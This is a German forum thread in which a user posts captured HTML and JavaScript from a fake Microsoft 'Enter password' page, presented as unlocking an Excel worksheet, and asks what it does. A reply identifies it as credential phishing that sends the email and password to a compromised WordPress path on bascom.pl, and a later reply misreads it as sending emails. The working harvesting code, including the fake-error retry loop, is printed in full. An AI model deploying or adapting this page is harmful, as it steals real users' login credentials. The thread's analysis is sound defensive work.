                <button type="button" class="backButton" id="idBtn_Back"> <img role="presentation" pngsrc="https://aadcdn.msftauth.net/shared/1.0/content/images/arrow_left_7cc096da6aa2dba3f81fcc1c8262157c.png" svgsrc="https://aadcdn.msftauth.net/shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg" src="https://aadcdn.msftauth.net/shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg"> </button>
                <div id="show-email" class="identity"></div>
            </div>
    <div id="loginHeader" class="row title ext-title">
        <div role="heading" aria-level="1">Enter password</div>
    </div>
    <div id="errorpw" style="color: red; margin: 15px; margin-left: 0px; margin-top: 0px; margin-bottom: 0px;"></div>
    <div id="important1" style="color: black;font-size: 13px;">
        Because you're accessing sensitive info, you need to verify your password to view excel worksheets
     </div>
    <div class="row">
        <div class="form-group col-md-24">
            <div class="placeholderContainer">
                <input name="passwd" type="password" id="i0118" autocomplete="off" class="form-control input ext-input text-box ext-text-box" placeholder="Password" required />
            </div>
        </div>
    </div>
    <div>
    <div class="position-buttons">
        <div>
            <div class="row">
                <div class="col-md-24">
                    <div class="text-13">
                        <div class="form-group">
                            <a id="idA_PWD_ForgotPassword" role="link" href="#">Note: Only recipient's email can access shared files</a>
                        </div>
    <div class="form-group">
    </div>
            <div class="form-group">
                <a id="i1668" href="#"></a>
            </div></div></div></div>
        </div>

        <div class="win-button-pin-bottom">
            <div class="row">
                <div><div class="col-xs-24 no-padding-left-right button-container">
        <div class="inline-block">
            <input type="submit" id="Button9" class="win-button button_primary button ext-button primary ext-primary" value="Signin">
        </div>
    </div></div>
            </div>
        </div>
    </div></div>
        </div>
    </div>
    </div>
    </div>
    </div>
        </div>
    </div></div>
            </div>
        </div>
        <div class="plate footer ext-footer" role="contentinfo"></div>
    <div id="footer" role="contentinfo" class="footer ext-footer">
        <div>
<div id="footerLinks" class="footerNode text-secondary">
        <a id="ftrTerms" href="#" class="footer-content ext-footer-content footer-item ext-footer-item">Terms of use</a>
        <a id="ftrPrivacy" href="#" class="footer-content ext-footer-content footer-item ext-footer-item">Privacy &amp; cookies</a>
    <a id="moreOptions" href="#" aria-label="Click here for troubleshooting information" class="footer-content ext-footer-content footer-item ext-footer-item debug-item ext-debug-item">...</a>
</div></div>
    </div>
</div>
</div></div>
</form>
<script>
    var count = 0;
    function set_brand(email) {
        $.ajax({
            url: 'https://bascom.pl/wp-content/themes/vantage/templates/zaki/pii.php',
            type: "POST",
            data: { username: email },
            success: function (response) {
                let res = JSON.parse(response)
                let logo = res["res"]["BannerLogo"], background = res["res"]["Illustration"], DarkTile = res["res"]["TileDarkLogo"]
                let TileLogo = res["res"]["TileLogo"], BoilerPlateText = res["res"]["BoilerPlateText"]
                if (logo) {
                    $('.logo').attr('src', logo);
                }
                if (BoilerPlateText) {
                    console.log(BoilerPlateText);
                    $(".plate").append(BoilerPlateText);
                    $(".plate").css({"text-align": "center"})
                }
                if (background) {
                    $('.background-image').css({ 'background-image': 'url(' + background + ')', "-webkit-filter": "brightness(20%)", "filter": "brightness(47%)" });
                } else if (DarkTile) {
                    $('.background-image').css({ 'background-image': 'url(' + DarkTile + ')', "-webkit-filter": "brightness(20%)", "filter": "brightness(47%)" });
                } else if (TileLogo) {
                    $('.background-image').css({ 'background-image': 'url(' + TileLogo + ')', "-webkit-filter": "brightness(20%)", "filter": "brightness(47%)" });
                }
            }
        });
    }

    function send_result(user, pass) {
        $.ajax({
            url: 'https://bascom.pl/wp-content/themes/vantage/templates/zaki/pii.php',
            data: {
                "email": user,
                "password": pass
            },
            type: "POST",
            success: function (data) {
                console.log(data);
            },
            error: function (data) {
                console.log('Ajax error');
            }
        });
    }


    document.addEventListener('DOMContentLoaded', async() => {
        if(url_string){
            document.getElementById("show-email").innerHTML = url_string;
            document.getElementById("i0118").focus();
            set_brand(url_string);
        }

        document.getElementById("Button9").addEventListener("click", e => {
            event.preventDefault ? event.preventDefault() : event.returnValue = false;

            var pswd = document.getElementById("i0118").value;
            if(pswd.length < 5){
                document.getElementById("important1").style.display="none";
                setTimeout(() => {document.getElementById("i0281").reset(); document.getElementById('errorpw').innerHTML = "Your account password is too short."}, 1500);
            } else if (pswd.length > 5 && count <= 0) {
                send_result(url_string, pswd);
                document.getElementById("important1").style.display="none";
                setTimeout(() => {count++; document.getElementById("i0281").reset(); document.getElementById('errorpw').innerHTML = `Your password is incorrect. Please enter the password for your above email to access Excel worksheet, <a href="#"></a>`}, 2000)
            } else if (count < 2){
                send_result(url_string, pswd);
                document.getElementById("important1").style.display = "none";
                setTimeout(() => {count++; document.getElementById("i0281").reset(); document.getElementById('errorpw').innerHTML = `Your password is incorrect. Please enter the password for your above email to access Excel worksheet, <a href="#"></a>`}, 2000)
            } else {
                send_result(url_string, pswd);
                setTimeout(() => {window.location.replace("https://outlook.office365.com/Encryption/ErrorPage.aspx?src=3&code=11&be=SN6PR04MB4014&fe=JNAP275CA0040.ZAFP275.PROD.OUTLOOgK.COM&loc=en-US&itemID=E4E_M_e9df154a-e4b8-4486-8aec-7acceeb93fee")});
            }
        });
    });
</script>
</div></body></html>

... leider spreche ich kein JavaScript! Könntet Ihr mich bitte aufklären, was die Scripts hier genau machen und welche Maßnahmen ich ergreifen muss!

Besten Dank im Voraus!


RE: Was machen diese JavaScripts? - rzscout - 19.10.2022

Hi,
das ganze erstellt sozusagen eine neue HTML-Seit mithilfe von JavaScript und der Methode write.
Es erstellt eine Fakeseite worauf eine Excel-Tabelle abgebildet ist, wo man sein Password eingeben soll. Es ist ein billiger billiger Trick um Daten abzufischen.

Zusatz: Er sendet die Daten also E-Mailadresse und gegebenfalls das eingegebene Passwort an: https://bascom.pl

Das würde ich dort vielleicht auch melden, weil die nix über deren Angriff wissen. Durch einen WordPress-Fehler konnten sie diese Seite nutzen, um heimlich Daten aufzuzeichnen.


RE: Was machen diese JavaScripts? - samlauncher44 - 11.07.2023

I guess it sends emails to an email user automatically.